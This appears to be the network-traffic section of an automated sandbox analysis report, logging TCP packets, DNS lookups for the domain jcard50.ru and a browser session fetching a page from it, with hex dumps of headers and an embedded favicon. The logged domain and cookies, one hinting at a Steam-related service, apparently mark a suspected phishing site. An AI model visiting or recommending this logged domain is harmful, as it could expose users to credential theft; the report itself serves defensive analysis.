                Jan 13, 2025 01:00:44.981554985 CET44349730104.21.112.1192.168.2.5
                Jan 13, 2025 01:00:44.981586933 CET49730443192.168.2.5104.21.112.1
                Jan 13, 2025 01:00:44.981594086 CET44349730104.21.112.1192.168.2.5
                Jan 13, 2025 01:00:44.981642008 CET44349730104.21.112.1192.168.2.5
                Jan 13, 2025 01:00:44.981671095 CET44349730104.21.112.1192.168.2.5
                Jan 13, 2025 01:00:44.981682062 CET49730443192.168.2.5104.21.112.1
                Jan 13, 2025 01:00:44.981689930 CET44349730104.21.112.1192.168.2.5
                Jan 13, 2025 01:00:44.981936932 CET49730443192.168.2.5104.21.112.1
                Jan 13, 2025 01:00:44.982283115 CET44349730104.21.112.1192.168.2.5
                Jan 13, 2025 01:00:44.982356071 CET44349730104.21.112.1192.168.2.5
                Jan 13, 2025 01:00:44.982389927 CET44349730104.21.112.1192.168.2.5
                Jan 13, 2025 01:00:44.982389927 CET49730443192.168.2.5104.21.112.1
                Jan 13, 2025 01:00:44.982402086 CET44349730104.21.112.1192.168.2.5
                Jan 13, 2025 01:00:44.982440948 CET49730443192.168.2.5104.21.112.1
                Jan 13, 2025 01:00:44.982449055 CET44349730104.21.112.1192.168.2.5
                Jan 13, 2025 01:00:44.983195066 CET44349730104.21.112.1192.168.2.5
                Jan 13, 2025 01:00:44.983228922 CET44349730104.21.112.1192.168.2.5
                Jan 13, 2025 01:00:44.983241081 CET49730443192.168.2.5104.21.112.1
                Jan 13, 2025 01:00:44.983247995 CET44349730104.21.112.1192.168.2.5
                Jan 13, 2025 01:00:44.983293056 CET44349730104.21.112.1192.168.2.5
                Jan 13, 2025 01:00:44.983328104 CET49730443192.168.2.5104.21.112.1
                Jan 13, 2025 01:00:44.983338118 CET44349730104.21.112.1192.168.2.5
                Jan 13, 2025 01:00:44.983370066 CET44349730104.21.112.1192.168.2.5
                Jan 13, 2025 01:00:44.983408928 CET49730443192.168.2.5104.21.112.1
                Jan 13, 2025 01:00:44.983414888 CET44349730104.21.112.1192.168.2.5
                Jan 13, 2025 01:00:44.983447075 CET49730443192.168.2.5104.21.112.1
                Jan 13, 2025 01:00:44.984095097 CET44349730104.21.112.1192.168.2.5
                Jan 13, 2025 01:00:44.984191895 CET44349730104.21.112.1192.168.2.5
                Jan 13, 2025 01:00:44.984239101 CET49730443192.168.2.5104.21.112.1
                Jan 13, 2025 01:00:44.984246016 CET44349730104.21.112.1192.168.2.5
                Jan 13, 2025 01:00:45.030076027 CET49730443192.168.2.5104.21.112.1
                Jan 13, 2025 01:00:45.072153091 CET44349730104.21.112.1192.168.2.5
                Jan 13, 2025 01:00:45.072223902 CET44349730104.21.112.1192.168.2.5
                Jan 13, 2025 01:00:45.072256088 CET44349730104.21.112.1192.168.2.5
                Jan 13, 2025 01:00:45.072268963 CET49730443192.168.2.5104.21.112.1
                Jan 13, 2025 01:00:45.072284937 CET44349730104.21.112.1192.168.2.5
                Jan 13, 2025 01:00:45.072326899 CET49730443192.168.2.5104.21.112.1
                Jan 13, 2025 01:00:45.072326899 CET44349730104.21.112.1192.168.2.5
                Jan 13, 2025 01:00:45.072340012 CET44349730104.21.112.1192.168.2.5
                Jan 13, 2025 01:00:45.072381973 CET49730443192.168.2.5104.21.112.1
                Jan 13, 2025 01:00:45.072388887 CET44349730104.21.112.1192.168.2.5
                Jan 13, 2025 01:00:45.072438002 CET44349730104.21.112.1192.168.2.5
                Jan 13, 2025 01:00:45.072526932 CET49730443192.168.2.5104.21.112.1
                Jan 13, 2025 01:00:45.074822903 CET49730443192.168.2.5104.21.112.1
                Jan 13, 2025 01:00:45.074839115 CET44349730104.21.112.1192.168.2.5
                Jan 13, 2025 01:00:45.409966946 CET44349732104.21.112.1192.168.2.5
                Jan 13, 2025 01:00:45.441912889 CET49732443192.168.2.5104.21.112.1
                Jan 13, 2025 01:00:45.441941977 CET44349732104.21.112.1192.168.2.5
                Jan 13, 2025 01:00:45.442431927 CET44349732104.21.112.1192.168.2.5
                Jan 13, 2025 01:00:45.496957064 CET49732443192.168.2.5104.21.112.1
                Jan 13, 2025 01:00:45.648121119 CET49732443192.168.2.5104.21.112.1
                Jan 13, 2025 01:00:45.648307085 CET44349732104.21.112.1192.168.2.5
                Jan 13, 2025 01:00:45.652502060 CET49732443192.168.2.5104.21.112.1
                Jan 13, 2025 01:00:45.695329905 CET44349732104.21.112.1192.168.2.5
                Jan 13, 2025 01:00:45.959629059 CET44349732104.21.112.1192.168.2.5
                Jan 13, 2025 01:00:45.959752083 CET44349732104.21.112.1192.168.2.5
                Jan 13, 2025 01:00:45.959810972 CET49732443192.168.2.5104.21.112.1
                Jan 13, 2025 01:00:45.961536884 CET49732443192.168.2.5104.21.112.1
                Jan 13, 2025 01:00:45.961569071 CET44349732104.21.112.1192.168.2.5
                Jan 13, 2025 01:00:49.576035023 CET44349719142.250.181.228192.168.2.5
                Jan 13, 2025 01:00:49.576109886 CET44349719142.250.181.228192.168.2.5
                Jan 13, 2025 01:00:49.576173067 CET49719443192.168.2.5142.250.181.228
                Jan 13, 2025 01:00:50.408736944 CET49719443192.168.2.5142.250.181.228
                Jan 13, 2025 01:00:50.408768892 CET44349719142.250.181.228192.168.2.5
                Jan 13, 2025 01:01:05.254049063 CET49835443192.168.2.5104.21.32.1
                Jan 13, 2025 01:01:05.254126072 CET44349835104.21.32.1192.168.2.5
                Jan 13, 2025 01:01:05.254216909 CET49835443192.168.2.5104.21.32.1
                Jan 13, 2025 01:01:05.255284071 CET49835443192.168.2.5104.21.32.1
                Jan 13, 2025 01:01:05.255337000 CET44349835104.21.32.1192.168.2.5
                Jan 13, 2025 01:01:05.738789082 CET44349835104.21.32.1192.168.2.5
                Jan 13, 2025 01:01:05.740848064 CET49835443192.168.2.5104.21.32.1
                Jan 13, 2025 01:01:05.740876913 CET44349835104.21.32.1192.168.2.5
                Jan 13, 2025 01:01:05.741272926 CET44349835104.21.32.1192.168.2.5
                Jan 13, 2025 01:01:05.742945910 CET49835443192.168.2.5104.21.32.1
                Jan 13, 2025 01:01:05.743021965 CET44349835104.21.32.1192.168.2.5
                Jan 13, 2025 01:01:05.744076014 CET49835443192.168.2.5104.21.32.1
                Jan 13, 2025 01:01:05.787324905 CET44349835104.21.32.1192.168.2.5
                Jan 13, 2025 01:01:06.068670034 CET44349835104.21.32.1192.168.2.5
                Jan 13, 2025 01:01:06.068741083 CET44349835104.21.32.1192.168.2.5
                Jan 13, 2025 01:01:06.068897009 CET49835443192.168.2.5104.21.32.1
                Jan 13, 2025 01:01:06.070962906 CET49835443192.168.2.5104.21.32.1
                Jan 13, 2025 01:01:06.071005106 CET44349835104.21.32.1192.168.2.5
                Jan 13, 2025 01:01:17.057379007 CET6359053192.168.2.51.1.1.1
                Jan 13, 2025 01:01:17.062169075 CET53635901.1.1.1192.168.2.5
                Jan 13, 2025 01:01:17.062313080 CET6359053192.168.2.51.1.1.1
                Jan 13, 2025 01:01:17.062313080 CET6359053192.168.2.51.1.1.1
                Jan 13, 2025 01:01:17.067137003 CET53635901.1.1.1192.168.2.5
                Jan 13, 2025 01:01:17.506932020 CET53635901.1.1.1192.168.2.5
                Jan 13, 2025 01:01:17.510179996 CET6359053192.168.2.51.1.1.1
                Jan 13, 2025 01:01:17.515095949 CET53635901.1.1.1192.168.2.5
                Jan 13, 2025 01:01:17.515177965 CET6359053192.168.2.51.1.1.1
                Jan 13, 2025 01:01:21.111874104 CET4970980192.168.2.5199.232.214.172
                Jan 13, 2025 01:01:21.117070913 CET8049709199.232.214.172192.168.2.5
                Jan 13, 2025 01:01:21.117153883 CET4970980192.168.2.5199.232.214.172
                Jan 13, 2025 01:01:23.056448936 CET6355453192.168.2.51.1.1.1
                Jan 13, 2025 01:01:23.061255932 CET53635541.1.1.1192.168.2.5
                Jan 13, 2025 01:01:23.061337948 CET6355453192.168.2.51.1.1.1
                Jan 13, 2025 01:01:23.061377048 CET6355453192.168.2.51.1.1.1
                Jan 13, 2025 01:01:23.066109896 CET53635541.1.1.1192.168.2.5
                Jan 13, 2025 01:01:23.538238049 CET53635541.1.1.1192.168.2.5
                Jan 13, 2025 01:01:23.539798021 CET6355453192.168.2.51.1.1.1
                Jan 13, 2025 01:01:23.544847965 CET53635541.1.1.1192.168.2.5
                Jan 13, 2025 01:01:23.544939995 CET6355453192.168.2.51.1.1.1
                Jan 13, 2025 01:01:39.011828899 CET63621443192.168.2.5142.250.181.228
                Jan 13, 2025 01:01:39.011872053 CET44363621142.250.181.228192.168.2.5
                Jan 13, 2025 01:01:39.012012959 CET63621443192.168.2.5142.250.181.228
                Jan 13, 2025 01:01:39.012355089 CET63621443192.168.2.5142.250.181.228
                Jan 13, 2025 01:01:39.012367964 CET44363621142.250.181.228192.168.2.5
                Jan 13, 2025 01:01:39.658482075 CET44363621142.250.181.228192.168.2.5
                Jan 13, 2025 01:01:39.662121058 CET63621443192.168.2.5142.250.181.228
                Jan 13, 2025 01:01:39.662130117 CET44363621142.250.181.228192.168.2.5
                Jan 13, 2025 01:01:39.662668943 CET44363621142.250.181.228192.168.2.5
                Jan 13, 2025 01:01:39.663001060 CET63621443192.168.2.5142.250.181.228
                Jan 13, 2025 01:01:39.663114071 CET44363621142.250.181.228192.168.2.5
                Jan 13, 2025 01:01:39.713601112 CET63621443192.168.2.5142.250.181.228
                Jan 13, 2025 01:01:49.568393946 CET44363621142.250.181.228192.168.2.5
                Jan 13, 2025 01:01:49.568469048 CET44363621142.250.181.228192.168.2.5
                Jan 13, 2025 01:01:49.568644047 CET63621443192.168.2.5142.250.181.228
                Jan 13, 2025 01:01:50.095339060 CET6327653192.168.2.51.1.1.1
                Jan 13, 2025 01:01:50.100264072 CET53632761.1.1.1192.168.2.5
                Jan 13, 2025 01:01:50.100347996 CET6327653192.168.2.51.1.1.1
                Jan 13, 2025 01:01:50.100419998 CET6327653192.168.2.51.1.1.1
                Jan 13, 2025 01:01:50.105218887 CET53632761.1.1.1192.168.2.5
                Jan 13, 2025 01:01:50.580127001 CET53632761.1.1.1192.168.2.5
                Jan 13, 2025 01:01:50.580708027 CET6327653192.168.2.51.1.1.1
                Jan 13, 2025 01:01:50.585733891 CET53632761.1.1.1192.168.2.5
                Jan 13, 2025 01:01:50.585802078 CET6327653192.168.2.51.1.1.1
                Jan 13, 2025 01:01:50.952729940 CET63621443192.168.2.5142.250.181.228
                Jan 13, 2025 01:01:50.952743053 CET44363621142.250.181.228192.168.2.5
                TimestampSource PortDest PortSource IPDest IP
                Jan 13, 2025 01:00:34.491007090 CET53509441.1.1.1192.168.2.5
                Jan 13, 2025 01:00:34.523397923 CET53574281.1.1.1192.168.2.5
                Jan 13, 2025 01:00:35.533305883 CET53604891.1.1.1192.168.2.5
                Jan 13, 2025 01:00:38.994039059 CET6385053192.168.2.51.1.1.1
                Jan 13, 2025 01:00:38.994704962 CET5320953192.168.2.51.1.1.1
                Jan 13, 2025 01:00:39.000967979 CET53638501.1.1.1192.168.2.5
                Jan 13, 2025 01:00:39.002204895 CET53532091.1.1.1192.168.2.5
                Jan 13, 2025 01:00:40.262965918 CET5046553192.168.2.51.1.1.1
                Jan 13, 2025 01:00:40.265539885 CET5089653192.168.2.51.1.1.1
                Jan 13, 2025 01:00:40.357858896 CET53504651.1.1.1192.168.2.5
                Jan 13, 2025 01:00:40.455576897 CET53508961.1.1.1192.168.2.5
                Jan 13, 2025 01:00:41.580267906 CET53628751.1.1.1192.168.2.5
                Jan 13, 2025 01:00:43.641516924 CET5723253192.168.2.51.1.1.1
                Jan 13, 2025 01:00:43.641711950 CET4980753192.168.2.51.1.1.1
                Jan 13, 2025 01:00:43.785428047 CET53498071.1.1.1192.168.2.5
                Jan 13, 2025 01:00:43.799464941 CET53572321.1.1.1192.168.2.5
                Jan 13, 2025 01:00:53.206659079 CET53515711.1.1.1192.168.2.5
                Jan 13, 2025 01:01:12.003869057 CET53550981.1.1.1192.168.2.5
                Jan 13, 2025 01:01:17.056534052 CET53559601.1.1.1192.168.2.5
                Jan 13, 2025 01:01:23.056013107 CET53539791.1.1.1192.168.2.5
                Jan 13, 2025 01:01:34.499707937 CET53586471.1.1.1192.168.2.5
                Jan 13, 2025 01:01:50.094839096 CET53524941.1.1.1192.168.2.5
                TimestampSource IPDest IPChecksumCodeType
                Jan 13, 2025 01:00:40.460879087 CET192.168.2.51.1.1.1c2d9(Port unreachable)Destination Unreachable
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Jan 13, 2025 01:00:38.994039059 CET192.168.2.51.1.1.10xac70Standard query (0)www.google.comA (IP address)IN (0x0001)false
                Jan 13, 2025 01:00:38.994704962 CET192.168.2.51.1.1.10xc556Standard query (0)www.google.com65IN (0x0001)false
                Jan 13, 2025 01:00:40.262965918 CET192.168.2.51.1.1.10x87d4Standard query (0)jcard50.ruA (IP address)IN (0x0001)false
                Jan 13, 2025 01:00:40.265539885 CET192.168.2.51.1.1.10xea19Standard query (0)jcard50.ru65IN (0x0001)false
                Jan 13, 2025 01:00:43.641516924 CET192.168.2.51.1.1.10xa2eaStandard query (0)jcard50.ruA (IP address)IN (0x0001)false
                Jan 13, 2025 01:00:43.641711950 CET192.168.2.51.1.1.10x7a9aStandard query (0)jcard50.ru65IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Jan 13, 2025 01:00:39.000967979 CET1.1.1.1192.168.2.50xac70No error (0)www.google.com142.250.181.228A (IP address)IN (0x0001)false
                Jan 13, 2025 01:00:39.002204895 CET1.1.1.1192.168.2.50xc556No error (0)www.google.com65IN (0x0001)false
                Jan 13, 2025 01:00:40.357858896 CET1.1.1.1192.168.2.50x87d4No error (0)jcard50.ru104.21.32.1A (IP address)IN (0x0001)false
                Jan 13, 2025 01:00:40.357858896 CET1.1.1.1192.168.2.50x87d4No error (0)jcard50.ru104.21.96.1A (IP address)IN (0x0001)false
                Jan 13, 2025 01:00:40.357858896 CET1.1.1.1192.168.2.50x87d4No error (0)jcard50.ru104.21.16.1A (IP address)IN (0x0001)false
                Jan 13, 2025 01:00:40.357858896 CET1.1.1.1192.168.2.50x87d4No error (0)jcard50.ru104.21.80.1A (IP address)IN (0x0001)false
                Jan 13, 2025 01:00:40.357858896 CET1.1.1.1192.168.2.50x87d4No error (0)jcard50.ru104.21.112.1A (IP address)IN (0x0001)false
                Jan 13, 2025 01:00:40.357858896 CET1.1.1.1192.168.2.50x87d4No error (0)jcard50.ru104.21.48.1A (IP address)IN (0x0001)false
                Jan 13, 2025 01:00:40.357858896 CET1.1.1.1192.168.2.50x87d4No error (0)jcard50.ru104.21.64.1A (IP address)IN (0x0001)false
                Jan 13, 2025 01:00:40.455576897 CET1.1.1.1192.168.2.50xea19No error (0)jcard50.ru65IN (0x0001)false
                Jan 13, 2025 01:00:43.785428047 CET1.1.1.1192.168.2.50x7a9aNo error (0)jcard50.ru65IN (0x0001)false
                Jan 13, 2025 01:00:43.799464941 CET1.1.1.1192.168.2.50xa2eaNo error (0)jcard50.ru104.21.112.1A (IP address)IN (0x0001)false
                Jan 13, 2025 01:00:43.799464941 CET1.1.1.1192.168.2.50xa2eaNo error (0)jcard50.ru104.21.64.1A (IP address)IN (0x0001)false
                Jan 13, 2025 01:00:43.799464941 CET1.1.1.1192.168.2.50xa2eaNo error (0)jcard50.ru104.21.80.1A (IP address)IN (0x0001)false
                Jan 13, 2025 01:00:43.799464941 CET1.1.1.1192.168.2.50xa2eaNo error (0)jcard50.ru104.21.96.1A (IP address)IN (0x0001)false
                Jan 13, 2025 01:00:43.799464941 CET1.1.1.1192.168.2.50xa2eaNo error (0)jcard50.ru104.21.16.1A (IP address)IN (0x0001)false
                Jan 13, 2025 01:00:43.799464941 CET1.1.1.1192.168.2.50xa2eaNo error (0)jcard50.ru104.21.32.1A (IP address)IN (0x0001)false
                Jan 13, 2025 01:00:43.799464941 CET1.1.1.1192.168.2.50xa2eaNo error (0)jcard50.ru104.21.48.1A (IP address)IN (0x0001)false
                Jan 13, 2025 01:00:48.019299030 CET1.1.1.1192.168.2.50x4f0fNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                Jan 13, 2025 01:00:48.019299030 CET1.1.1.1192.168.2.50x4f0fNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                Jan 13, 2025 01:00:49.430154085 CET1.1.1.1192.168.2.50xfb25No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                Jan 13, 2025 01:00:49.430154085 CET1.1.1.1192.168.2.50xfb25No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                Jan 13, 2025 01:01:08.300333023 CET1.1.1.1192.168.2.50x89b8No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                Jan 13, 2025 01:01:08.300333023 CET1.1.1.1192.168.2.50x89b8No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                • jcard50.ru
                • https:
                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.549721104.21.32.1443748C:\Program Files\Google\Chrome\Application\chrome.exe
                TimestampBytes transferredDirectionData
                2025-01-13 00:00:40 UTC654OUTGET /e HTTP/1.1
                Host: jcard50.ru
                Connection: keep-alive
                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                sec-ch-ua-mobile: ?0
                sec-ch-ua-platform: "Windows"
                Upgrade-Insecure-Requests: 1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Sec-Fetch-Site: none
                Sec-Fetch-Mode: navigate
                Sec-Fetch-User: ?1
                Sec-Fetch-Dest: document
                Accept-Encoding: gzip, deflate, br
                Accept-Language: en-US,en;q=0.9
                2025-01-13 00:00:41 UTC1235INHTTP/1.1 200 OK
                Date: Mon, 13 Jan 2025 00:00:41 GMT
                Content-Type: text/html; charset=utf-8
                Transfer-Encoding: chunked
                Connection: close
                Cross-Origin-Opener-Policy: same-origin
                Cross-Origin-Resource-Policy: same-origin
                Origin-Agent-Cluster: ?1
                Referrer-Policy: no-referrer
                Set-Cookie: session=eyJhbGciOiJBMTI4S1ciLCJlbmMiOiJBMTI4R0NNIn0.TlDUUQDijjfjQz2lJu1YQt2_fLToQS8c.wUtwJT6gR5YZAIon.crxuLFHMNFFmpc2ccH-E9JHvQ-TAyM37N959zvnw0WhmkERX-L4QWyiHsDEa_Klm_O_sbUDQK0WUYsZPbR2kobKXxJebQc-bTpvlF5Ht8OuGcEOnvjlUSS5o8QRXAInTGyce8PvafR_upXqYsRCebt-2mnn_SYMyzfyzXChO1vBJPXzQERxIrV-vnV9_1ywCYCf26HsFDLZYdYk_-Witow.oNE33_itdKf7PRHc1TQdNw; Path=/; Expires=Mon, 13 Jan 2025 04:00:41 GMT; SameSite=Lax
                Set-Cookie: token=eyJhbGciOiJIUzI1NiJ9.eyJvd25lciI6MjAzLCJzZWNyZXQiOiI0M2QxOGRlZmM3OGJmNzkyZDFhZDE1MmI5ZTIyYWE4MSIsInNlcnZpY2UiOiJTdGVhbSJ9.yfSWhV4PrhDFs7l2gG5wsFg9StiBx__TJdgJ59eWysk; Path=/; Expires=Mon, 13 Jan 2025 04:00:41 GMT; SameSite=Lax
                Strict-Transport-Security: max-age=15552000; includeSubDomains
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                X-Dns-Prefetch-Control: off
                X-Download-Options: noopen
                X-Frame-Options: SAMEORIGIN
                X-Permitted-Cross-Domain-Policies: none
                X-Xss-Protection: 0
                cf-cache-status: DYNAMIC
                2025-01-13 00:00:41 UTC609INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 64 44 42 4e 39 42 70 6e 59 59 77 73 69 36 57 78 45 32 66 52 50 50 47 49 76 74 78 44 56 77 49 36 45 6d 4b 46 42 56 55 61 77 30 6c 25 32 42 46 52 7a 6e 6e 67 72 36 77 52 43 77 59 44 66 73 75 6b 46 64 65 58 32 45 4b 33 42 73 6d 72 6d 48 63 6d 38 4d 63 25 32 46 44 6d 42 55 68 4f 44 76 75 65 79 75 71 74 6b 44 37 62 65 56 49 36 6f 6b 64 76 57 67 4c 71 30 57 65 30 51 7a 45 42 44 37 4a 62 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20 7b 22 73 75
                Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dDBN9BpnYYwsi6WxE2fRPPGIvtxDVwI6EmKFBVUaw0l%2BFRznngr6wRCwYDfsukFdeX2EK3BsmrmHcm8Mc%2FDmBUhODvueyuqtkD7beVI6okdvWgLq0We0QzEBD7Jb"}],"group":"cf-nel","max_age":604800}NEL: {"su
                2025-01-13 00:00:41 UTC395INData Raw: 31 38 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 3e 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 0a 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 76 68 3b 0a 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31
                Data Ascii: 184<!DOCTYPE html><html lang=""><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><style> html, body { padding: 0; margin: 0; height: 100vh; width: 1
                2025-01-13 00:00:41 UTC1369INData Raw: 37 66 66 61 0d 0a 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 27 20 68 72 65 66 3d 27 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 66 69 6c 65 6e 61 6d 65 3d 66 61 76 69 63 6f 6e 2e 69 63 6f 3b 62 61 73 65 36 34 2c 41 41 41 42 41 41 55 41 45 42 41 41 41 41 45 41 49 41 42 6f 42 41 41 41 56 67 41 41 41 42 67 59 41 41 41 42 41 43 41 41 69 41 6b 41 41 4c 34 45 41 41 41 67 49 41 41 41 41 51 41 67 41 4b 67 51 41 41 42 47 44 67 41 41 4d 44 41 41 41 41 45 41 49 41 43 6f 4a 51 41 41 37 68 34 41 41 41 41 41 41 41 41 42 41 43 41 41 42 46 49 41 41 4a 5a 45 41 41 41 6f 41 41 41 41 45 41 41 41 41 43 41 41 41 41 41 42 41 43 41 41 41 41 41 41 41 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                Data Ascii: 7ffa <link rel='shortcut icon' href='data:image/x-icon;filename=favicon.ico;base64,AAABAAUAEBAAAAEAIABoBAAAVgAAABgYAAABACAAiAkAAL4EAAAgIAAAAQAgAKgQAABGDgAAMDAAAAEAIACoJQAA7h4AAAAAAAABACAABFIAAJZEAAAoAAAAEAAAACAAAAABACAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAA
                2025-01-13 00:00:41 UTC1369INData Raw: 41 33 47 51 59 59 4e 68 6b 49 73 44 59 5a 43 50 38 32 47 51 6a 2f 4e 68 6b 49 2f 7a 59 5a 43 50 38 32 47 51 6a 2f 4e 42 63 47 2f 30 41 6c 46 66 39 53 4f 69 76 2f 52 69 77 63 2f 7a 55 59 42 2f 38 32 47 41 65 77 4f 42 6b 48 47 44 63 5a 42 77 41 78 47 77 30 41 4e 42 6f 4b 41 44 51 61 43 68 67 30 47 67 75 53 4d 78 73 4d 37 6a 4d 62 44 50 38 7a 47 77 7a 2f 4d 78 73 4d 2f 7a 4d 62 44 50 38 79 47 67 76 2f 4d 52 6b 4b 2f 7a 49 61 43 75 34 7a 47 67 75 53 4e 52 6f 4b 47 44 51 61 43 67 41 79 47 77 34 41 41 41 41 41 41 41 41 41 41 41 41 78 47 77 30 41 4d 52 73 4e 42 7a 45 63 44 6b 67 77 48 41 36 6f 4d 42 77 50 35 44 41 63 44 2f 73 77 48 41 2f 38 4d 42 77 50 35 44 41 63 44 71 67 78 48 41 35 4a 4d 52 73 4e 42 7a 45 62 44 51 41 41 41 41 41 41 41 41 41 41 41 4f 41 48 41
                Data Ascii: A3GQYYNhkIsDYZCP82GQj/NhkI/zYZCP82GQj/NBcG/0AlFf9SOiv/Riwc/zUYB/82GAewOBkHGDcZBwAxGw0ANBoKADQaChg0GguSMxsM7jMbDP8zGwz/MxsM/zMbDP8yGgv/MRkK/zIaCu4zGguSNRoKGDQaCgAyGw4AAAAAAAAAAAAxGw0AMRsNBzEcDkgwHA6oMBwP5DAcD/swHA/8MBwP5DAcDqgxHA5JMRsNBzEbDQAAAAAAAAAAAOAHA
                2025-01-13 00:00:41 UTC1369INData Raw: 55 2f 33 56 43 46 50 39 31 51 68 54 2f 64 55 49 55 2f 33 56 43 46 50 39 31 51 68 54 2f 64 55 49 55 2f 33 56 43 46 4f 6c 30 51 42 51 38 31 63 61 35 6a 4f 54 61 30 76 2f 38 2b 2f 72 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 36 2b 66 6a 2f 77 36 36 66 2f 37 57 61 68 76 2f 2b 2f 76 33 2f 35 4e 72 54 2f 35 70 32 57 76 39 75 4f 78 54 2f 62 54 6b 53 2f 32 34 36 45 2f 39 75 4f 68 50 2f 62 6a 6f 54 2f 32 34 36 45 2f 39 75 4f 68 50 2f 62 6a 6f 54 2f 32 34 36 45 2f 39 74 4f 52 4f 4b 2f 2f 2f 2f 7a 66 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 76 37 2f 2f 66 7a 37 2f 2b 2f 70 35 76 2b 33 6e 35 44 2f 73 5a 61 46 2f 2f 44 72 35 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 58 79 37 2f 2b 31 6e 49 7a 2f 63 6b
                Data Ascii: U/3VCFP91QhT/dUIU/3VCFP91QhT/dUIU/3VCFOl0QBQ81ca5jOTa0v/8+/r////////////////////////////6+fj/w66f/7Wahv/+/v3/5NrT/5p2Wv9uOxT/bTkS/246E/9uOhP/bjoT/246E/9uOhP/bjoT/246E/9tOROK////zf///////////////////////v7//fz7/+/p5v+3n5D/sZaF//Dr5/////////////Xy7/+1nIz/ck
                2025-01-13 00:00:41 UTC1369INData Raw: 47 41 58 2f 4f 68 67 46 2f 7a 6f 59 42 76 38 35 46 67 50 2f 58 30 4d 30 2f 38 37 47 77 76 2f 34 39 2f 62 2f 36 4f 54 68 2f 2b 72 6d 35 50 2f 34 39 2f 62 2f 77 37 6d 7a 2f 31 51 33 4a 2f 38 35 46 67 50 2f 4f 78 67 47 34 54 73 59 42 6a 49 37 47 41 59 41 4f 52 67 46 41 44 45 66 45 67 41 34 47 41 5a 6b 4f 42 6b 47 39 44 67 5a 42 76 38 34 47 51 62 2f 4f 42 6b 47 2f 7a 67 5a 42 76 38 34 47 51 62 2f 4f 42 6b 47 2f 7a 67 5a 42 76 38 34 47 51 62 2f 4e 68 59 45 2f 30 63 71 47 76 39 39 61 56 33 2f 6f 35 57 4e 2f 36 43 53 69 76 39 32 59 56 58 2f 51 79 55 55 2f 7a 59 58 42 50 38 34 47 51 62 30 4f 42 67 47 5a 44 41 66 45 67 41 35 47 41 55 41 41 41 41 41 41 44 63 5a 43 41 41 33 47 51 63 46 4e 68 6b 49 65 44 59 61 43 66 51 32 47 67 6e 2f 4e 68 6f 4a 2f 7a 59 61 43 66 38
                Data Ascii: GAX/OhgF/zoYBv85FgP/X0M0/87Gwv/49/b/6OTh/+rm5P/49/b/w7mz/1Q3J/85FgP/OxgG4TsYBjI7GAYAORgFADEfEgA4GAZkOBkG9DgZBv84GQb/OBkG/zgZBv84GQb/OBkG/zgZBv84GQb/NhYE/0cqGv99aV3/o5WN/6CSiv92YVX/QyUU/zYXBP84GQb0OBgGZDAfEgA5GAUAAAAAADcZCAA3GQcFNhkIeDYaCfQ2Ggn/NhoJ/zYaCf8
